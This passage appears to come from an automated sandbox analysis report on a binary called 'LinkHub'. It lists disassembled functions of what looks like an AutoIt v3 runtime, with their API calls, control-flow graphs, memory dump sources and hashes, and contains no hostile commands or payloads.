                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002037C6
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00203709,?,?), ref: 002037D1
                                                                                        • CreatePopupMenu.USER32 ref: 002037E5
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00203806
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: 0$-$0$-$TaskbarCreated
                                                                                        • API String ID: 129472671-12809645
                                                                                        • Opcode ID: 215facbae750b2cd717c99f4e1e85f46d89c2494d4b34f863720303277408076
                                                                                        • Instruction ID: 6f08e656a4e4a0207af9be46fad3ee70338141e6b4cb3ac3cb44869052b6eeb5
                                                                                        • Opcode Fuzzy Hash: 215facbae750b2cd717c99f4e1e85f46d89c2494d4b34f863720303277408076
                                                                                        • Instruction Fuzzy Hash: 1A41C3B1630346FADB14AF68AD5DBA9BA6DEB14300F104126F501862E2CAA49E789661
                                                                                        Function 002409DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 412 2409db-240a0b call 2407af 415 240a26-240a32 call 235594 412->415 416 240a0d-240a18 call 22f636 412->416 422 240a34-240a49 call 22f636 call 22f649 415->422 423 240a4b-240a94 call 24071a 415->423 421 240a1a-240a21 call 22f649 416->421 432 240cfd-240d03 421->432 422->421 430 240a96-240a9f 423->430 431 240b01-240b0a GetFileType 423->431 435 240ad6-240afc GetLastError call 22f613 430->435 436 240aa1-240aa5 430->436 437 240b53-240b56 431->437 438 240b0c-240b3d GetLastError call 22f613 CloseHandle 431->438 435->421 436->435 441 240aa7-240ad4 call 24071a 436->441 439 240b5f-240b65 437->439 440 240b58-240b5d 437->440 438->421 449 240b43-240b4e call 22f649 438->449 444 240b69-240bb7 call 2354dd 439->444 445 240b67 439->445 440->444 441->431 441->435 455 240bc7-240beb call 2404cd 444->455 456 240bb9-240bc5 call 24092b 444->456 445->444 449->421 461 240bed 455->461 462 240bfe-240c41 455->462 456->455 463 240bef-240bf9 call 238a2e 456->463 461->463 465 240c62-240c70 462->465 466 240c43-240c47 462->466 463->432 469 240c76-240c7a 465->469 470 240cfb 465->470 466->465 468 240c49-240c5d 466->468 468->465 469->470 471 240c7c-240caf CloseHandle call 24071a 469->471 470->432 474 240cb1-240cdd GetLastError call 22f613 call 2356a6 471->474 475 240ce3-240cf7 471->475 474->475 475->470
                                                                                        APIs
                                                                                          • Part of subcall function 0024071A: CreateFileW.KERNELBASE(00000000,00000000,?,00240A84,?,?,00000000,?,00240A84,00000000,0000000C), ref: 00240737
                                                                                        • GetLastError.KERNEL32 ref: 00240AEF
                                                                                        • __dosmaperr.LIBCMT ref: 00240AF6
                                                                                        • GetFileType.KERNELBASE(00000000), ref: 00240B02
                                                                                        • GetLastError.KERNEL32 ref: 00240B0C
                                                                                        • __dosmaperr.LIBCMT ref: 00240B15
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00240B35
                                                                                        • CloseHandle.KERNEL32(?), ref: 00240C7F
                                                                                        • GetLastError.KERNEL32 ref: 00240CB1
                                                                                        • __dosmaperr.LIBCMT ref: 00240CB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                        • String ID: H
                                                                                        • API String ID: 4237864984-2852464175
                                                                                        • Opcode ID: f049a269961d7642ef06d23c64a3943eb293f87d8090b98d0e0074895b045677
                                                                                        • Instruction ID: be8e31191bfe6140f4535479a24e76abab3022a4597f2dd153ecca145faf3282
                                                                                        • Opcode Fuzzy Hash: f049a269961d7642ef06d23c64a3943eb293f87d8090b98d0e0074895b045677
                                                                                        • Instruction Fuzzy Hash: D9A13632A202159FCF1DAF68E896BAD7BA0EB06324F14015AF911DF3D1C7359C62CB51
                                                                                        Function 002052A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00205594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00244B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 002055B2
                                                                                          • Part of subcall function 00205238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0020525A
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002053C4
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00244BFD
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00244C3E
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00244C80
                                                                                        • _wcslen.LIBCMT ref: 00244CE7
                                                                                        • _wcslen.LIBCMT ref: 00244CF6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                        • API String ID: 98802146-2727554177
                                                                                        • Opcode ID: 1637516584af24e4dc586371db0436c5491704ba5c3d2ebff7a392bbe8fef63c
                                                                                        • Instruction ID: 5a2baa696e0ae9882ee0de39b0a56ad88f925730540f834b9d589d8b5cd2987c
                                                                                        • Opcode Fuzzy Hash: 1637516584af24e4dc586371db0436c5491704ba5c3d2ebff7a392bbe8fef63c
                                                                                        • Instruction Fuzzy Hash: 6F719E71925301AFC714EF69ED8999BBBE8FF48340F80046EF441931A1DB719A68CF92
                                                                                        Function 002034D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 002034DE
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 002034ED
                                                                                        • LoadIconW.USER32(00000063), ref: 00203503
                                                                                        • LoadIconW.USER32(000000A4), ref: 00203515
                                                                                        • LoadIconW.USER32(000000A2), ref: 00203527
                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0020353F
                                                                                        • RegisterClassExW.USER32(?), ref: 00203590
                                                                                          • Part of subcall function 00203624: GetSysColorBrush.USER32(0000000F), ref: 00203657
                                                                                          • Part of subcall function 00203624: RegisterClassExW.USER32(00000030), ref: 00203681
                                                                                          • Part of subcall function 00203624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00203692
                                                                                          • Part of subcall function 00203624: InitCommonControlsEx.COMCTL32(?), ref: 002036AF
                                                                                          • Part of subcall function 00203624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002036BF
                                                                                          • Part of subcall function 00203624: LoadIconW.USER32(000000A9), ref: 002036D5
                                                                                          • Part of subcall function 00203624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002036E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: 1c5a5265468c46d301d2ec5823cd9534bc039a747c65ad519bf1a5dd79f02943
                                                                                        • Instruction ID: 0d120726da58bce75c2f76506355e1d686bf524389f8b3a9fdc5f405ecfb695d
                                                                                        • Opcode Fuzzy Hash: 1c5a5265468c46d301d2ec5823cd9534bc039a747c65ad519bf1a5dd79f02943
                                                                                        • Instruction Fuzzy Hash: 02214970D11318EBDB509FA5FC4DBAABFB8FB18B50F00015BE604A62A0C7B90958DF94
                                                                                        Function 0020F6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Variable must be of type 'Object'.$t5-$t5-$t5-$t5-$t5-t5-
                                                                                        • API String ID: 0-683389354
                                                                                        • Opcode ID: 1f63e93fd29c90b3eef1496eca6634fddd56a16e98879ff14722e3241a706daf
                                                                                        • Instruction ID: 4d4f5831580b0e9f50ab2d339149cbaea7151d8037b50ffe4a72c12c35b7abdf
                                                                                        • Opcode Fuzzy Hash: 1f63e93fd29c90b3eef1496eca6634fddd56a16e98879ff14722e3241a706daf
                                                                                        • Instruction Fuzzy Hash: 84C2AF71E60215DFCB20DF58D980AADB7F1BF08304F24816AE905AB792D375ADA1CF91
                                                                                        Function 00202AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1063 202ab0-202ae9 1064 243a1a-243a1b DestroyWindow 1063->1064 1065 202aef-202b05 mciSendStringW 1063->1065 1068 243a26-243a33 1064->1068 1066 202d66-202d73 1065->1066 1067 202b0b-202b13 1065->1067 1070 202d75-202d90 UnregisterHotKey 1066->1070 1071 202d98-202d9f 1066->1071 1067->1068 1069 202b19-202b28 call 202ede 1067->1069 1073 243a35-243a38 1068->1073 1074 243a62-243a69 1068->1074 1084 243a70-243a7c 1069->1084 1085 202b2e-202b36 1069->1085 1070->1071 1076 202d92-202d93 call 202770 1070->1076 1071->1067 1072 202da5 1071->1072 1072->1066 1079 243a44-243a47 FindClose 1073->1079 1080 243a3a-243a42 call 207aab 1073->1080 1074->1068 1078 243a6b 1074->1078 1076->1071 1078->1084 1083 243a4d-243a5a 1079->1083 1080->1083 1083->1074 1086 243a5c-243a5d call 273cf6 1083->1086 1089 243a86-243a8d 1084->1089 1090 243a7e-243a80 FreeLibrary 1084->1090 1087 243a94-243aa1 1085->1087 1088 202b3c-202b61 call 20e6a0 1085->1088 1086->1074 1095 243aa3-243ac0 VirtualFree 1087->1095 1096 243ac8-243acf 1087->1096 1100 202b63 1088->1100 1101 202b98-202ba3 CoUninitialize 1088->1101 1089->1084 1094 243a8f 1089->1094 1090->1089 1094->1087 1095->1096 1098 243ac2-243ac3 call 273d5c 1095->1098 1096->1087 1099 243ad1 1096->1099 1098->1096 1103 243ad6-243ada 1099->1103 1104 202b66-202b96 call 2030c0 call 203069 1100->1104 1101->1103 1105 202ba9-202bae 1101->1105 1103->1105 1106 243ae0-243ae4 call 270b4c 1103->1106 1104->1101 1108 202bb4-202bbe 1105->1108 1109 243aeb-243af8 call 273d30 1105->1109 1114 243ae6 1106->1114 1112 202bc4-202c45 call 20bd98 call 202ff4 call 202e85 call 220184 call 202e1c call 20bd98 call 20e6a0 call 202eae call 220184 1108->1112 1113 202da7-202db4 call 21fb19 1108->1113 1121 243afa 1109->1121 1126 243aff-243b21 call 22013d 1112->1126 1153 202c4b-202c6f call 220184 1112->1153 1113->1112 1123 202dba 1113->1123 1114->1105 1121->1126 1123->1113 1132 243b23 1126->1132 1135 243b28-243b4a call 22013d 1132->1135 1140 243b4c 1135->1140 1143 243b51-243b73 call 22013d 1140->1143 1149 243b75 1143->1149 1152 243b7a-243b87 call 266e3b 1149->1152 1159 243b89 1152->1159 1153->1135 1158 202c75-202c99 call 220184 1153->1158 1158->1143 1163 202c9f-202cb9 call 220184 1158->1163 1162 243b8e-243b9b call 21bdf0 1159->1162 1167 243b9d 1162->1167 1163->1152 1169 202cbf-202ce3 call 202e85 call 220184 1163->1169 1170 243ba2-243baf call 273c8a 1167->1170 1169->1162 1178 202ce9-202cf1 1169->1178 1176 243bb1 1170->1176 1179 243bb6-243bc3 call 273d11 1176->1179 1178->1170 1180 202cf7-202d15 call 20bd98 call 202fba 1178->1180 1186 243bc5 1179->1186 1180->1179 1188 202d1b-202d29 1180->1188 1189 243bca-243bd7 call 273d11 1186->1189 1188->1189 1190 202d2f-202d65 call 20bd98 * 3 call 202f26 1188->1190 1194 243bd9 1189->1194 1194->1194
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00202AF9
                                                                                        • CoUninitialize.COMBASE ref: 00202B98
                                                                                        • UnregisterHotKey.USER32(?), ref: 00202D7D
                                                                                        • DestroyWindow.USER32(?), ref: 00243A1B
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00243A80
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00243AAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                        • String ID: close all
                                                                                        • API String ID: 469580280-3243417748
                                                                                        • Opcode ID: 5c5666663763a536cfdfafdf8b2e807a30cc520bd02cf0a21b89a735f506aecd
                                                                                        • Instruction ID: 8813d36959cbdf12567fdcf4a4e66faea05e3eddf6955982a2a64b2e0566a436
                                                                                        • Opcode Fuzzy Hash: 5c5666663763a536cfdfafdf8b2e807a30cc520bd02cf0a21b89a735f506aecd
                                                                                        • Instruction Fuzzy Hash: DDD15D31721222DFDB29EF14D489B69F7A4BF04714F1542AEE44A6B292CB31AD36CF40
                                                                                        Function 00202793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153comCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002032AF
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 002032B7
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002032C2
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002032CD
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 002032D5
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 002032DD
                                                                                          • Part of subcall function 00203205: RegisterWindowMessageW.USER32(00000004,?,00202964), ref: 0020325D
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00202A0A
                                                                                        • OleInitialize.OLE32 ref: 00202A28
                                                                                        • CloseHandle.KERNELBASE(00000000,00000000), ref: 00243A0D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID: (&-$0$-$4'-$d(-$$-
                                                                                        • API String ID: 1986988660-1608988187
                                                                                        • Opcode ID: 46aca61079195ae7955c991e174218d2fb290d9c6181c1713533f93aa5225ced
                                                                                        • Instruction ID: 19d4e849fdeca79761dcbda2a69ad7317d79f1112e9dcfe14e84bc19286c7100
                                                                                        • Opcode Fuzzy Hash: 46aca61079195ae7955c991e174218d2fb290d9c6181c1713533f93aa5225ced
                                                                                        • Instruction Fuzzy Hash: 85717EB0D22341CED799EF69B96DA157BE4FB68304390416BE408C73A2EB704C5DAF64
                                                                                        Function 002390C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1246 2390c5-2390d5 1247 2390d7-2390ea call 22f636 call 22f649 1246->1247 1248 2390ef-2390f1 1246->1248 1264 239471 1247->1264 1250 2390f7-2390fd 1248->1250 1251 239459-239466 call 22f636 call 22f649 1248->1251 1250->1251 1254 239103-23912e 1250->1254 1269 23946c call 232b5c 1251->1269 1254->1251 1257 239134-23913d 1254->1257 1260 239157-239159 1257->1260 1261 23913f-239152 call 22f636 call 22f649 1257->1261 1262 239455-239457 1260->1262 1263 23915f-239163 1260->1263 1261->1269 1268 239474-239479 1262->1268 1263->1262 1267 239169-23916d 1263->1267 1264->1268 1267->1261 1271 23916f-239186 1267->1271 1269->1264 1274 2391a3-2391ac 1271->1274 1275 239188-23918b 1271->1275 1279 2391ca-2391d4 1274->1279 1280 2391ae-2391c5 call 22f636 call 22f649 call 232b5c 1274->1280 1277 239195-23919e 1275->1277 1278 23918d-239193 1275->1278 1281 23923f-239259 1277->1281 1278->1277 1278->1280 1283 2391d6-2391d8 1279->1283 1284 2391db-2391f9 call 233b93 call 232d38 * 2 1279->1284 1312 23938c 1280->1312 1285 23925f-23926f 1281->1285 1286 23932d-239336 call 23fc1b 1281->1286 1283->1284 1315 239216-23923c call 2397a4 1284->1315 1316 2391fb-239211 call 22f649 call 22f636 1284->1316 1285->1286 1289 239275-239277 1285->1289 1299 2393a9 1286->1299 1300 239338-23934a 1286->1300 1289->1286 1293 23927d-2392a3 1289->1293 1293->1286 1297 2392a9-2392bc 1293->1297 1297->1286 1302 2392be-2392c0 1297->1302 1304 2393ad-2393c5 ReadFile 1299->1304 1300->1299 1305 23934c-23935b GetConsoleMode 1300->1305 1302->1286 1307 2392c2-2392ed 1302->1307 1309 239421-23942c GetLastError 1304->1309 1310 2393c7-2393cd 1304->1310 1305->1299 1311 23935d-239361 1305->1311 1307->1286 1314 2392ef-239302 1307->1314 1317 239445-239448 1309->1317 1318 23942e-239440 call 22f649 call 22f636 1309->1318 1310->1309 1319 2393cf 1310->1319 1311->1304 1320 239363-23937d ReadConsoleW 1311->1320 1313 23938f-239399 call 232d38 1312->1313 1313->1268 1314->1286 1326 239304-239306 1314->1326 1315->1281 1316->1312 1323 239385-23938b call 22f613 1317->1323 1324 23944e-239450 1317->1324 1318->1312 1330 2393d2-2393e4 1319->1330 1321 23937f GetLastError 1320->1321 1322 23939e-2393a7 1320->1322 1321->1323 1322->1330 1323->1312 1324->1313 1326->1286 1333 239308-239328 1326->1333 1330->1313 1337 2393e6-2393ea 1330->1337 1333->1286 1341 239403-23940e 1337->1341 1342 2393ec-2393fc call 238de1 1337->1342 1344 239410 call 238f31 1341->1344 1345 23941a-23941f call 238c21 1341->1345 1351 2393ff-239401 1342->1351 1352 239415-239418 1344->1352 1345->1352 1351->1313 1352->1351
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: da8b81d42b1727de850ad498eb845e242ca4aa421aeec5fc2fad7780587a6a41
                                                                                        • Instruction ID: aa59ddda4d7d750d3b639fcb5ce0ed51aab55bb1292c763d9aced107071bd0a1
                                                                                        • Opcode Fuzzy Hash: da8b81d42b1727de850ad498eb845e242ca4aa421aeec5fc2fad7780587a6a41
                                                                                        • Instruction Fuzzy Hash: 69C1D5F192424AAFDB119FA8D845BADBBB4AF0A300F144095E564A7392C7B09DA1CF61
                                                                                        Function 002035B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1354 2035b3-203623 CreateWindowExW * 2 ShowWindow * 2
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002035E1
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00203602
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00203368,?), ref: 00203616
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00203368,?), ref: 0020361F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: d847d8298d8fd09edd8d3526e735d21edf9221d43310df00d22ec52d1db6f2a7
                                                                                        • Instruction ID: d296fe516a7419d54450cb5615025a9d35c87511baaf31ced28a798451f70186
                                                                                        • Opcode Fuzzy Hash: d847d8298d8fd09edd8d3526e735d21edf9221d43310df00d22ec52d1db6f2a7
                                                                                        • Instruction Fuzzy Hash: 8CF03A70A01294BAEB7107177C0CE776FBDD7D6F10B00005FBA04A7160C2691C59EAB0
                                                                                        Function 00271196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1355 271196-2711bf InterlockedExchange 1356 2711c1-2711c2 call 22017b 1355->1356 1357 2711cd-2711f6 call 22017b ReadFile 1355->1357 1360 2711c7-2711c8 1356->1360 1362 2712ae-2712b2 1357->1362 1363 2711fc-271200 1357->1363 1360->1357 1366 2712b4-2712b7 call 220184 1362->1366 1367 2712c1-2712d0 InterlockedExchange 1362->1367 1364 271206-27121b EnterCriticalSection 1363->1364 1365 2712a8-2712ab 1363->1365 1368 27121d-27122c 1364->1368 1369 271269-2712a2 call 221190 LeaveCriticalSection ReadFile 1364->1369 1365->1362 1374 2712bc-2712c0 1366->1374 1372 271234-271266 call 242430 call 22017b call 221190 call 220184 1368->1372 1373 27122e 1368->1373 1369->1363 1369->1365 1372->1369 1373->1372 1374->1367
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 002711B3
                                                                                        • ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 002711EE
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0027120A
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00271283
                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0027129A
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 002712C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
